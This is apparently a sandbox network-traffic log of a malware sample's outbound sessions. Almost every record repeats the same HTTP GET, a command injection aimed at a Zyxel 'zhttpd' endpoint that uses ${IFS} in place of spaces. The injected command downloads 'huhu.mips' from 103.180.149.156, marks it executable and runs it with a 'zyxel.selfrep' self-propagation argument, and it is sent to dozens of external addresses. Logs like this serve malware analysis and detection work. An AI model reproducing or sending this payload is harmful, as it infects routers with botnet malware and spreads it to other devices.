                                            Feb 2, 2024 06:21:21.801208973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6604192.168.2.153740675.182.246.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801264048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6605192.168.2.153295667.144.56.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801311016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6606192.168.2.1541408189.12.33.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801359892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6607192.168.2.1540154109.7.154.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801392078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6608192.168.2.153496686.103.113.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801422119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6609192.168.2.1537890124.92.29.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801467896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6610192.168.2.154311851.86.85.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801503897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6611192.168.2.155913058.152.34.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801548004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6612192.168.2.1549012188.220.2.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801604033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6613192.168.2.1554872148.240.238.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801640987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6614192.168.2.1550978125.36.35.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801668882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6615192.168.2.155293854.50.49.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801697969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6616192.168.2.154504423.16.236.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801733971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6617192.168.2.155214068.142.104.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801773071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6618192.168.2.1541686212.90.187.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801805973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6619192.168.2.1549706147.86.220.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801820040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6620192.168.2.1536260101.175.108.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801842928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6621192.168.2.1553020156.120.12.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801877975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6622192.168.2.1560382141.198.185.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801913977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6623192.168.2.1546490192.171.145.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.801965952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6624192.168.2.153898065.11.226.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802010059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6625192.168.2.1546174166.126.184.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802047968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6626192.168.2.1555278145.138.1.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802078009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6627192.168.2.155373625.166.102.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802114010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6628192.168.2.153671253.88.162.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802164078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6629192.168.2.154266672.120.49.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802189112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6630192.168.2.1553038110.241.163.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802237034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6631192.168.2.1557096209.79.211.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802285910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6632192.168.2.1550916171.156.27.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802287102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6633192.168.2.1534376161.135.211.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802340984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6634192.168.2.1539176163.241.118.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802395105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6635192.168.2.1548540171.6.201.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802418947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6636192.168.2.1537720135.74.61.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802454948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6637192.168.2.1533310182.215.204.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802484989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6638192.168.2.154290223.76.158.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802514076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6639192.168.2.153519842.145.230.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802572012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6640192.168.2.1559068126.71.39.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802618027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6641192.168.2.153965238.33.186.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802628994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6642192.168.2.1551356107.91.79.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802660942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6643192.168.2.15405742.88.65.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802700043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6644192.168.2.15555849.11.147.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802731037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6645192.168.2.153675884.59.129.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802783966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6646192.168.2.1555298117.160.74.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802815914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6647192.168.2.1549356152.128.252.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802840948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6648192.168.2.1544456156.50.194.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802879095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6649192.168.2.1545326185.115.98.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802906036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6650192.168.2.1560004123.152.70.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802957058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6651192.168.2.153904058.161.13.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.802993059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6652192.168.2.153915266.248.66.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.803020954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6653192.168.2.1534632126.42.51.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826050043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6654192.168.2.155104874.224.138.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826080084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6655192.168.2.154601465.139.238.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826112986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6656192.168.2.154744860.204.140.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826143026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6657192.168.2.155808054.126.85.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826200008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6658192.168.2.1544850174.190.20.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826231003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6659192.168.2.1550162188.230.206.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826299906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6660192.168.2.155938850.24.27.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826328993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6661192.168.2.156097294.63.151.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826342106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6662192.168.2.154453423.212.87.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826381922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6663192.168.2.1549438194.137.124.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826407909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6664192.168.2.1545816169.209.198.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826435089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6665192.168.2.1550616164.220.162.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826468945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6666192.168.2.1546436103.157.115.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826546907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6667192.168.2.153394272.186.74.240443
                                            TimestampBytes transferredDirectionData
